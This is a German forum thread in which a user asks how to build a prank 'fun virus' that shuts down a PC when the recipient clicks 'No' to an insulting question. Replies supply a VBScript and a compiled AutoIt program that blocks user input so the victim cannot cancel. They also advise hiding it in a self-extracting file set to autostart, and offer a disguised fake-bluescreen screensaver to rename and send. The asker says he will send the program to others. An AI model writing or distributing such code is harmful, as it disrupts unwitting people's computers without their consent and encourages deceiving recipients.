murb.com Hauptseite  •   Registrieren  •  SUCHE  •  FAQ  •  Mitgliederliste  •  Forenregeln  •  Login
Neue Antwort erstellen Programm Frage
Gehe zu Seite 1, 2  Weiter
Programm Frage
maiktime
Beiträge: 20
Antworten mit Zitat
Hab hier mal ne Frage:
Ich wollte mal so ein FunVirus machen.
Wo z.B. steht: Bist du doof? Ja Nein.
Wenn man dann auf Nein klickt fährt der PC runter.
Ich weeiß aber nicht wo dieser Runterfahr ding ist.
Ich glaube C:\Windows\System32\Shutdown.exe
Und dann wollte ich mal fragen wleches das einfachst program sit um sowas zu machen`?
Benutzer-Profile anzeigenAlle Beiträge von maiktime anzeigenPrivate Nachricht senden
aVe
LM;
Beiträge: 1507
Antworten mit Zitat
1. Ich glaube das wir hier keine Viren unterstützen also kannst du lange warten bis dir hier Einer schreibt wie es genau heißst.

2.Du must schreiben das es nen bestimmten Befehl ausführen soll Wink welchen hab ich gerade irgendwie auf komische Art und Weise vergessen

_________________
mfG aVe
Das Recht auf Dummheit gehört zur Garantie der freien Entfaltung der Persönlichkeit. (Mark Twain)
Miranda IM Version: 0.8.24 Unicode | ICQJ Plus Mod | 0.3.10.64 | Unicode aware |
Benutzer-Profile anzeigenAlle Beiträge von aVe anzeigenPrivate Nachricht senden
Skip
Offizieller Forumsbot
Beiträge: 933
Antworten mit Zitat
Zudem kommt es drauf an, mit welcher Programmiersprache du progammierst.
Evtl. wäre das aber auch schon einfach mit einer Batch-Datei möglich.

_________________
qip Infium
Benutzer-Profile anzeigenAlle Beiträge von Skip anzeigenPrivate Nachricht sendenICQ-Nummer
|>>Flo<<|
Beiträge: 130
Antworten mit Zitat
soweit ich mich erinnern kann geht es mit shoutdown -s
Ich kann dir für Spaßviren Autoit empfehlen ist eine kleine Script Sprache in die man sich schnell eingewöhnt da gibt es auch eine Funktion shoutdown Wink

_________________
MfG Flo
Benutzer-Profile anzeigenAlle Beiträge von |>>Flo<<| anzeigenPrivate Nachricht senden
IhAtErIcK
Beiträge: 143
Antworten mit Zitat
der befehl heißt shutdown -s

der gegenbefehl lautet shutdown -a


allerdings dauert das runterfahren ne kurze zeit
Benutzer-Profile anzeigenAlle Beiträge von IhAtErIcK anzeigenPrivate Nachricht sendenICQ-Nummer
|>>Flo<<|
Beiträge: 130
Antworten mit Zitat
ja kein ahnung wieso ich auf shout gekommen bin ^^

_________________
MfG Flo
Benutzer-Profile anzeigenAlle Beiträge von |>>Flo<<| anzeigenPrivate Nachricht senden
Jagged
Beiträge: 336
Antworten mit Zitat
so weit ich weiss fährt der PC sich heruner sobald man shutdown -s -t 00 eingegeben hat.
-t steht für die Zeit in Sekunden.
Benutzer-Profile anzeigenAlle Beiträge von Jagged anzeigenPrivate Nachricht sendenE-Mail senden
PainT
Administrator
Beiträge: 5115
Antworten mit Zitat
Hier ein VBScript-Beispiel:

Code:
If MsgBox("Bist du doof?", 20, "Frage") = 7 Then
 Set sh = CreateObject("WScript.Shell")
 sh.Run("shutdown.exe -s -t 30")
End If

Kopieren und als *.vbs speichern Wink
Die Zeit ist auf 30 Sekunden gestellt, mit 0 wollte ich nicht testen Very Happy
Benutzer-Profile anzeigenAlle Beiträge von PainT anzeigenPrivate Nachricht sendenE-Mail sendenWebsite dieses Benutzers besuchenICQ-Nummer
|>>Flo<<|
Beiträge: 130
Antworten mit Zitat
Hier mal eins mit Autoit geschrieben vorher werden noch alle benutzereingaben gesperrt damit der user den Vorgang nicht abbrechen kann Wink

Code:

$lol = MsgBox (4, "Dumm", "Bist du dumm?" )
If $lol = 7 Then
   BlockInput (1)

   msgbox (0, "Haha" , "Natürlich bist du dumm! Dein Computer wurd nun heruntergefahren!",5 )
   
   Shutdown ( 1 )
Else
   msgbox (0 , "LoL" , "Wusst ich doch")
   EndIf


Suche bei Google nach AutoIt lade runter installiere erstell eine Datei die auf .au3 endet füge den Code ein speichere danach ab und klicke auf die Datei rechts und dann auf Compilieren Wink so erhältst du eine .exe ^^


EdiT Sorry ein kleiner Fehler hab ihn jetzt behoben und compilier das gleichmal ^^

So hier much fun Wink

http://rapidshare.com/files/42652118/FunVirus.exe

hab ihn nicht ausprobiert das solltest du einmalmachen bevor du ihn verschickst ^^

_________________
MfG Flo
Benutzer-Profile anzeigenAlle Beiträge von |>>Flo<<| anzeigenPrivate Nachricht senden
aVe
LM;
Beiträge: 1507
Antworten mit Zitat
ja 0 Sekunden kann recht tötlich sein, aber zuempfehlen ist wenn ihr es in eine extrahierende Datei packt die sich in den Autostart setzt Wink
dann auf 8 Sec oder so einstellen und euer Opfer kann sich freuen xD

_________________
mfG aVe
Das Recht auf Dummheit gehört zur Garantie der freien Entfaltung der Persönlichkeit. (Mark Twain)
Miranda IM Version: 0.8.24 Unicode | ICQJ Plus Mod | 0.3.10.64 | Unicode aware |
Benutzer-Profile anzeigenAlle Beiträge von aVe anzeigenPrivate Nachricht senden
maiktime
Beiträge: 20
Antworten mit Zitat
Den ersten hab ich schon ausprobiert und klappt^^
Werd den mal verschicke
Thx noch mal ihr hacker Very Happy
Benutzer-Profile anzeigenAlle Beiträge von maiktime anzeigenPrivate Nachricht senden
Exon
Beiträge: 491
Antworten mit Zitat
|>>Flo<<| hat Folgendes geschrieben:

hab ihn nicht ausprobiert das solltest du einmalmachen bevor du ihn verschickst ^^


Hab ihn gerade ausprobiert. Die Frage erscheind zwar. Hab auf Nein geklickt und es passiert nix Very Happy


Mein PC is imun gegen dich Very Happy Very Happy Very Happy Very Happy Very Happy

_________________
FAQ zu ICQ-Problemen: Passwort vergessen/gehackt, Virus und Trojaner in Downloads
2 Sachen muss man beachten um reich zu werden:
1. Gib nie alles preis was du weißt!
Benutzer-Profile anzeigenAlle Beiträge von Exon anzeigenPrivate Nachricht senden
|>>Flo<<|
Beiträge: 130
Antworten mit Zitat
Exon hat Folgendes geschrieben:
|>>Flo<<| hat Folgendes geschrieben:

hab ihn nicht ausprobiert das solltest du einmalmachen bevor du ihn verschickst ^^


Hab ihn gerade ausprobiert. Die Frage erscheind zwar. Hab auf Nein geklickt und es passiert nix Very Happy


Mein PC is imun gegen dich Very Happy Very Happy Very Happy Very Happy Very Happy


Erstmal SOrry das ich auf den "alten" Tread antworte war halt ein Paar Tage weg Cool
Also bei mir funktioniert es wie es sein soll Wink hab grad ausprobiert Embarassed

_________________
MfG Flo
Benutzer-Profile anzeigenAlle Beiträge von |>>Flo<<| anzeigenPrivate Nachricht senden
Skip
Offizieller Forumsbot
Beiträge: 933
Antworten mit Zitat
Gib mal deine eMail, dann schick ich dir n wirklich harmlosen Bildschirmschoner, der es aber im ersten Moment in sich hat. Wenn du ihn irgendwie umbenennst, ihn jmd schickst und er den ausführt, erhält der jenige einen schönen Bluescreen(-Bildschirmschoner) der einen "Neustart" verursacht... Very Happy

_________________
qip Infium
Benutzer-Profile anzeigenAlle Beiträge von Skip anzeigenPrivate Nachricht sendenICQ-Nummer
|>>Flo<<|
Beiträge: 130
Antworten mit Zitat
Lad doch mal hoch ^^

_________________
MfG Flo
Benutzer-Profile anzeigenAlle Beiträge von |>>Flo<<| anzeigenPrivate Nachricht senden
Programm Frage
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Alle Zeiten sind GMT + 1 Stunde  
Seite 1 von 2  

  
  
 Neue Antwort erstellen  
Powered by phpBB © phpBB Group
Design by phpBBStyles.com | Styles Database.
Content © murb.com - Forum